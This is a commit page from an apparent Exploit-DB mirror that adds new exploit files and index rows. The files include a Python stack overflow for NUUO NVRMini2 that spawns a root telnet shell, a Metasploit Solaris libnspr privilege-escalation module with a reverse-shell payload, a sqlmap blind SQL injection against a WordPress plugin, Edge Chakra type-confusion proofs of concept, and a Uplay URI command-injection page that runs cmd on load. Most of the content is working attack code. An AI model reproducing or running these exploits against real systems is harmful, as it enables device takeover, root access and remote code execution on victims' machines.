bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-09-19

Browse source 
7 changes to exploits/shellcodes

Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)
Microsoft Edge Chakra - 'PathTypeHandlerBase::SetAttributesHelper' Type Confusion
Microsoft Edge Chakra JIT - 'localeCompare' Type Confusion

Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)
NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution

HongCMS 3.0.0 - SQL Injection
HongCMS 3.0.0 - (Authenticated) SQL Injection

Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting

WordPress Plugin Arigato Autoresponder and Newsletter 2.5 - Blind SQL Injection / Reflected Cross-Site Scripting

Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)
This commit is contained in:
Offensive Security 2018-09-19 05:01:45 +00:00
parent f1d68507cd
commit 29542c36ab
9 changed files with 917 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

98
exploits/hardware/remote/45427.py Executable file
View file

@ -0,0 +1,98 @@
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
# Date: 2018-09-17
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.nuuo.com/
# Device: NRVMini2
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Versions: 3.8.0 and below
# Tested Against: 03.07.0000.0011 and 03.08.0000.0005
# Tested on: Ubuntu and OSX
# CVE: N/A
# TRA: https://www.tenable.com/security/research/tra-2018-25
# Description:
# A stack buffer overflow exists in the cgi_system binary. The error occurs
# due to lack of bounds checking on the PHPSESSID value before and when
# it is passed to sprintf in order to generate the session id file name.
# As written, this exploit enables Telnet.
# Executes a command via the stack buffer overflow in cookie parsing. The command
# is executed via 'system' as root. The overlow logic is like so:
#
# address 1: 405e2e34 - load system into r3 and address 2 into lr
#
# .text:000D0E34 0F 48 BD E8 LDMFD SP!, {R0-R3,R11,LR}
# .text:000D0E38 1E FF 2F E1 BX LR
#
# address 2: 406037cc - load the system command into r0. Jump to system.
#
# .text:000F17CC 0D 00 A0 E1 MOV R0, SP
# .text:000F17D0 33 FF 2F E1 BLX R3
#
# [ address 1 ][ r0 ][ r1 ][ r2 ][ r3 system ][ r11 ][ LR - addr2 ][ system command ]
# \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat
# PoC
import requests
import socket
import sys
def stack_buffer_overflow(command, ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print '[+] Executing %s on %s:%s...' % (command, ip, port)
sock.connect((ip, int(port)))
exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
'Host: ' + ip + ':' + port + '\r\n' +
'Accept: */*\r\n' +
'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
'\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command +
'\r\n\r\n')
sock.sendall(exec_request)
data = sock.recv(1024)
sock.close()
# We should get a 500 Internal error in response
return data.find('500') != -1
# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out since
# haven't tested on any other targets
def check_target(ip, port):
index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1)
if __name__ == "__main__":
if (len(sys.argv) != 3):
print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>"
sys.exit(1)
ip = sys.argv[1]
port = sys.argv[2]
if int(port) > 65535:
print('[-] Invalid port parameter')
sys.exit(0)
if len(ip.split('.')) != 4:
print('[-] Invalid IP address parameter')
sys.exit(0)
print '[+] Checking for a valid target...'
if (check_target(ip, port) == False):
print('[-] The target is not a NVRMini2 or its using an untested version.')
sys.exit(0)
print '[+] Valid target!'
if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False):
print('[-] Mount failed')
sys.exit(0)
if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False):
print('[-] telnetd bind failed')
sys.exit(0)
print('[+] Success!')

116
exploits/php/webapps/45434.txt Normal file
View file

@ -0,0 +1,116 @@
Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2018-08-22
CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009]
Download Site: https://wordpress.org/plugins/bft-autoresponder/
Vendor: Kiboko Labs https://calendarscripts.info/
Vendor Notified: 2018-08-22, Fixed v2.5.1.5
Vendor Contact: @prasunsen wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=203
Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date.
Vulnerability:
These vulnerabilities require administrative priveledges to exploit.
CVE-2018-1002000
There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request.
In line 69 of file controllers/list.php:
65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")");
del_ids is not sanitized properly.
Nine Reflected XSS.
CVE-2018-1002001
In line 22-23 of controllers/list.php:
22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob'];
23 echo "<meta http-equiv='refresh' content='0;url=$url' />";
CVE-2018-1002002
bft_list.html.php:28:
<div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div>
CVE-2018-1002003
bft_list.html.php:29:
<div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div>
CVE-2018-1002004
bft_list.html.php:42:
<input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>">
CVE-2018-1002005
bft_list.html.php:43:
<input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div>
CVE-2018-1002006
integration-contact-form.html.php:14:
<p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p>
CVE-2018-1002007
integration-contact-form.html.php:15:
<p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p>
CVE-2018-1002008
list-user.html.php:4:
<p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p>
CVE-2018-1002009
unsubscribe.html.php:3:
<p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p>
Exploit Code:
SQL Injection CVE-2018-1002000
$ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql
Where post_data is:
POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://example.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
---
[11:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'
[*] shutting down at 11:50:08
CVE-2018-1002001
http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS

250
exploits/solaris/local/45433.rb Executable file
View file

@ -0,0 +1,250 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Solaris::Priv
include Msf::Post::Solaris::System
include Msf::Post::Solaris::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',
'Description' => %q{
This module exploits an arbitrary file write vulnerability in the
Netscape Portable Runtime library (libnspr) on unpatched Solaris systems
prior to Solaris 10u3 which allows users to gain root privileges.
libnspr versions prior to 4.6.3 allow users to specify a log file with
the `NSPR_LOG_FILE` environment variable. The log file is created with
the privileges of the running process, resulting in privilege escalation
when used in combination with a SUID executable.
This module writes a shared object to the trusted library directory
`/usr/lib/secure` and runs the specified SUID binary with the shared
object loaded using the `LD_LIBRARY_PATH` environment variable.
This module has been tested successfully with libnspr version 4.5.1
on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).
},
'References' =>
[
['BID', '20471'],
['CVE', '2006-4842'],
['EDB', '2543'],
['EDB', '2569'],
['EDB', '2641'],
['URL', 'https://securitytracker.com/id/1017050'],
['URL', 'https://securitytracker.com/id/1017051'],
['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],
['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],
['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']
],
'License' => MSF_LICENSE,
'Author' =>
[
'iDefense', # Discovery
'Marco Ivaldi', # Exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Oct 11 2006',
'Privileged' => true,
'Platform' => ['solaris'],
'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],
'Targets' => [['Auto', {}]],
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultOptions' =>
{
'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
# Some useful example SUID executables:
# * /usr/bin/cancel
# * /usr/bin/chkey
# * /usr/bin/lp
# * /usr/bin/lpset
# * /usr/bin/lpstat
# * /usr/lib/lp/bin/netpr
# * /usr/sbin/lpmove
OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def suid_bin_path
datastore['SUID_PATH']
end
def is_writable?(path)
cmd_exec("[ -w #{path} ] && echo true").include? 'true'
end
def mkdir(path)
vprint_status "Creating directory '#{path}'"
cmd_exec "mkdir -p '#{path}'"
register_dir_for_cleanup path
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_compile(path, data)
upload "#{path}.c", data
output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
register_file_for_cleanup path
end
def check
unless setuid? suid_bin_path
vprint_error "#{suid_bin_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{suid_bin_path} is setuid"
unless has_gcc?
vprint_error 'gcc is not installed'
return CheckCode::Safe
end
vprint_good 'gcc is installed'
# libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable
# Earlier versions may also be vulnerable
libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'
libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\s+([\d\.]+),/).flatten.first
if libnspr_pkg_version.to_s.eql? ''
vprint_error 'Could not determine libnspr version'
return CheckCode::Unknown
end
if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')
vprint_error "libnspr version #{libnspr_pkg_version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "libnspr version #{libnspr_pkg_version} appears to be vulnerable"
# Solaris 10 versions prior to the 2006 patches are known to be vulnerable.
# Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,
# however third-party software may also introduce a vulnerable version of the library.
version = kernel_release
if version.to_s.eql? ''
vprint_error 'Could not determine Solaris version'
return CheckCode::Detected
end
unless Gem::Version.new(version) <= Gem::Version.new('5.10')
vprint_error "Solaris version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Solaris version #{version} appears to be vulnerable"
# The vulnerability was patched in various Solaris patches for different platforms.
# For more information, see:
# - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1
installed_patches = cmd_exec 'showrev -p'
[
119214, # Solaris 10 (x86) patch 119214-10
119213, # Solaris 10 (SPARC) patch 119213-10
119212, # Solaris 9 (x86) patch 119212-10
119211, # Solaris 9 (SPARC) patch 119211-10
119209 # Solaris 8 (SPARC) patch 119209-10
].each do |patch|
if installed_patches =~ / #{patch}-(\d+)/
revision = $1.to_i
if revision >= 10
vprint_error "Solaris patch #{patch}-#{revision} has been applied"
return CheckCode::Safe
end
end
end
vprint_good 'Solaris patches are not installed'
CheckCode::Appears
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
unless is_writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
# Create writable file in /usr/lib/secure
lib_path = '/usr/lib/secure'
lib_name = 'libldap.so.5'
vprint_status "Creating file #{lib_path}/#{lib_name}"
cmd_exec 'umask 0'
cmd_exec "NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\"#{lib_path}/#{lib_name}\" #{suid_bin_path}"
cmd_exec "NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}"
cmd_exec 'umask 022'
unless is_writable? "#{lib_path}/#{lib_name}"
fail_with Failure::Unknown, "Could not create file '#{lib_path}/#{lib_name}'"
end
print_good "Created file #{lib_path}/#{lib_name}"
register_file_for_cleanup "#{lib_path}/#{lib_name}"
# Upload and compile shared object
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
mkdir base_path
payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_path}/#{payload_name}"
so = <<-EOF
void __attribute__((constructor)) cons() {
setuid(0);
setgid(0);
execle("#{payload_path}", "", 0, 0);
_exit(0);
}
EOF
so_name = ".#{rand_text_alphanumeric 5..10}"
so_path = "#{base_path}/#{so_name}"
upload_and_compile so_path, so
vprint_status "Writing shared object #{lib_path}/#{lib_name}"
cmd_exec "cp '#{so_path}' '#{lib_path}/#{lib_name}'"
register_file_for_cleanup "#{lib_path}/#{lib_name}"
# Upload and execute payload
upload payload_path, generate_payload_exe
cmd_exec "chmod +x #{payload_path}"
print_status 'Executing payload...'
cmd_exec "LD_LIBRARY_PATH=\"#{lib_path}\" #{suid_bin_path} & echo "
end
end

51
exploits/windows/dos/45431.js Normal file
View file

@ -0,0 +1,51 @@
/*
Here's a snippet of PathTypeHandlerBase::SetAttributesHelper.
PathTypeHandlerBase *predTypeHandler = this;
DynamicType *currentType = instance->GetDynamicType();
while (predTypeHandler->GetPathLength() > propertyIndex)
{
currentType = predTypeHandler->GetPredecessorType();
if (currentType == nullptr)
{
#ifdef PROFILE_TYPES
instance->GetScriptContext()->convertPathToDictionaryNoRootCount++;
#endif
// This can happen if object header inlining is deoptimized, and we haven't built a full path from the root.
// For now, just punt this case.
return TryConvertToSimpleDictionaryType(instance, GetPathLength())->SetAttributes(instance, propertyId, ObjectSlotAttributesToPropertyAttributes(propertyAttributes));
}
predTypeHandler = PathTypeHandlerBase::FromTypeHandler(currentType->GetTypeHandler());
}
When object header inlining is deoptimized, the type handler of the object is converted to a dictionary type handler. The problem is that it doesn't consider some attributes that dictionary type handlers don't have, so adding or removing those attributes can fail. ObjectSlotAttr_Accessor which indicates that the property is an accessor is one of them.
Here's a snippet of PathTypeHandlerBase::SetPropertyInternal.
else if (isInit)
{
ObjectSlotAttributes * attributes = this->GetAttributeArray();
if (attributes && (attributes[index] & ObjectSlotAttr_Accessor))
{
this->SetAttributesHelper(instance, propertyId, index, attributes, (ObjectSlotAttributes)(attributes[index] & ~ObjectSlotAttr_Accessor), true);
// We're changing an accessor into a data property at object init time. Don't cache this transition from setter to non-setter,
// as it behaves differently from a normal set property.
PropertyValueInfo::SetNoCache(info, instance);
newTypeHandler = PathTypeHandlerBase::FromTypeHandler(instance->GetDynamicType()->GetTypeHandler());
newTypeHandler->SetSlotUnchecked(instance, index, value);
return true;
}
}
We can use the bug to make removing ObjectSlotAttr_Accessor fail. As a result, a data value can be used as an accessor.
PoC:
*/
let o = {
get a() {},
0: 0, // Deoptimizing object header inlining
a: 0x1234
};
o.a; // Type confusion

84
exploits/windows/dos/45432.js Normal file
View file

@ -0,0 +1,84 @@
/*
A call to the String.prototype.localeCompare method can be inlineed when it only takes one argument. There are two versions of String.prototype.localeCompare, one [1] is written in JavaScript and the other [2] is written in C++ which just calls the JavaScript version when Intl enabled without updating ImplicitCallFlags. Since JavaScript code could be executed without touching ImplicitCallFlags, this could be exploited in a similar way to that I used for issue 1565 .
The only usable code I could find in the JavaScript localeCompare was:
const thatStr = String(that);
I could override the toString method of "that" which is the first parameter to execute arbitrary JavaScript code. But there was a problem that the toString method was also called in the C++ localeCompare prior to executing the JavaScript localeCompare which updated ImplicitCallFlags. Actually calling a JavaScript function can clear the flag during the initialization process [3] if profiling is enabled, but it was not for Intl.js. So I needed to find another way to exploit this.
Here's the JavaScript localeCompare.
let localeCompareStateCache;
platform.registerBuiltInFunction(tagPublicFunction("String.prototype.localeCompare", function (that, locales = undefined, options = undefined) {
if (this === undefined || this === null) {
platform.raiseThis_NullOrUndefined("String.prototype.localeCompare");
}
const thisStr = String(this);
const thatStr = String(that);
// Performance optimization to cache the state object and UCollator when the default arguments are provided
// TODO(jahorto): investigate caching when locales and/or options are provided
let stateObject;
if (locales === undefined && options === undefined) {
if (localeCompareStateCache === undefined) {
localeCompareStateCache = _.create();
InitializeCollator(localeCompareStateCache, undefined, undefined);
}
stateObject = localeCompareStateCache;
} else {
stateObject = _.create();
InitializeCollator(stateObject, locales, options);
}
return platform.localeCompare(thisStr, thatStr, stateObject, /* forStringPrototypeLocaleCompare true);
}), IntlBuiltInFunctionID.StringLocaleCompare);
My idea was to optimize the method partially, so that when it hits an unprofiled instruction, the flag gets cleared during the bailout process [4].
[1] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/InJavascript/Intl.js#L984
[2] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/JavascriptString.cpp#L1297
[3] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Language/InterpreterStackFrame.cpp#L1831
[4] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Backend/BailOut.cpp#L1492
PoC:
*/
function opt(arr, s) {
arr[0] = 1.1;
if (s !== null) {
let tmp = 'a'.localeCompare(s);
}
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 100; i++) {
'a'.localeCompare('x', []); // Optimize the JavaScript localeCompare
opt(arr, null); // for profiling all instructions in opt.
try {
opt(arr, {toString: () => {
throw 1; // Don't profile "if (locales === undefined && options === undefined) {"
}});
} catch (e) {
}
}
opt(arr, {toString: () => {
// Called twice
arr[0] = {};
}});
print(arr);
}
main();

82
exploits/windows/remote/45429.txt Normal file
View file

@ -0,0 +1,82 @@
# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A
# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF)
# integrated within the Uplay client, allowing for arbitrary code execution.
# Installing Uplay registers the following custom uplay protocol handler:
# HKEY_CLASSES_ROOT
# uplay
# (Default) = "URL:uplay Protocol"
# URL Protocol = ""
# DefaultIcon
# (Default) = "upc.exe"
# Shell
# Open
# Command
# (Default) = "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "%1"
# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:
'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
# When a victim opens this URI, the string is passed to the Windows ShellExecute function.
# Microsoft states the following: "When ShellExecute executes the pluggable protocol handler with a
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will
# be interpreted as part of the command line. This means that if you use C/C++s argc and
# argv to determine the arguments passed to your application, the string may be broken
# across multiple parameters."
# "Malicious parties could use additional quote or backslash characters to pass additional command
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on
# the command line could come from malicious parties, and carefully validate them."
# The Uplay desktop client does not properly validate user-controlled data. An attacker can inject
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the
# command line with a quote character and inserts a new switch called --GPU-launcher. Since the
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.
# The --GPU-launcher switch provides a method to execute arbitrary commands. The following string shows
# the final command, which opens the Windows command prompt and executes the whoami program.
"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --"
# Attack Scenario
# The following attack scenario would result in the compromise of a victim's machine with the vulnerable
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge
# is trying to open "UPlay launcher". After the user gives consent, the vulnerable application runs,
# resulting in arbitrary code execution in the context of the current process.
# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape
# illegal characters before passing the URI to the protocol handler.
# After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables
# before the --GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService
# requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear.
# It should be noted, this UAC prompt doesn't prevent command execution from occurring.
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No),
# command execution will still occur once the code that passes the --GPU-launcher switch
# to the CEF is triggered within upc.exe.
# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge.
# The first method triggers when the webpage is opened. The second method triggers when the
# hyperlink is clicked by a user.
<!doctype html>
<a href='uplay://foobar" --GPU-launcher="cmd /K whoami &" --'>ubisoft uplay desktop client rce poc</a>
<script>
window.location = 'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
</script>

12
files_exploits.csv
View file

@ -6115,7 +6115,9 @@ id,file,description,date,author,type,platform,port
45419,exploits/windows_x86/dos/45419.py,"XAMPP Control Panel 3.2.2 - Denial of Service (PoC)",2018-09-17,"Gionathan Reale",dos,windows_x86,
45420,exploits/windows_x86-64/dos/45420.py,"Notebook Pro 2.0 - Denial Of Service (PoC)",2018-09-17,"Ali Alipour",dos,windows_x86-64,
45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64,
45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,
45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,21
45431,exploits/windows/dos/45431.js,"Microsoft Edge Chakra - 'PathTypeHandlerBase::SetAttributesHelper' Type Confusion",2018-09-18,"Google Security Research",dos,windows,
45432,exploits/windows/dos/45432.js,"Microsoft Edge Chakra JIT - 'localeCompare' Type Confusion",2018-09-18,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9977,6 +9979,7 @@ id,file,description,date,author,type,platform,port
45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux,
45412,exploits/windows_x86/local/45412.py,"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)",2018-09-14,"Gionathan Reale",local,windows_x86,
45433,exploits/solaris/local/45433.rb,"Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)",2018-09-18,Metasploit,local,solaris,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16807,6 +16810,8 @@ id,file,description,date,author,type,platform,port
45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux,
45367,exploits/multiple/remote/45367.rb,"Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)",2018-09-10,Metasploit,remote,multiple,
45425,exploits/java/remote/45425.py,"CA Release Automation NiMi 6.5 - Remote Command Execution",2018-09-17,"Jakub Palaczynski",remote,java,
45427,exploits/hardware/remote/45427.py,"NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)",2018-09-18,"Jacob Baines",remote,hardware,80
45429,exploits/windows/remote/45429.txt,"Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution",2018-09-18,"Che-Chun Kuo",remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39806,7 +39811,7 @@ id,file,description,date,author,type,platform,port
44939,exploits/hardware/webapps/44939.txt,"Intex Router N-150 - Arbitrary File Upload",2018-06-25,"Samrat Das",webapps,hardware,
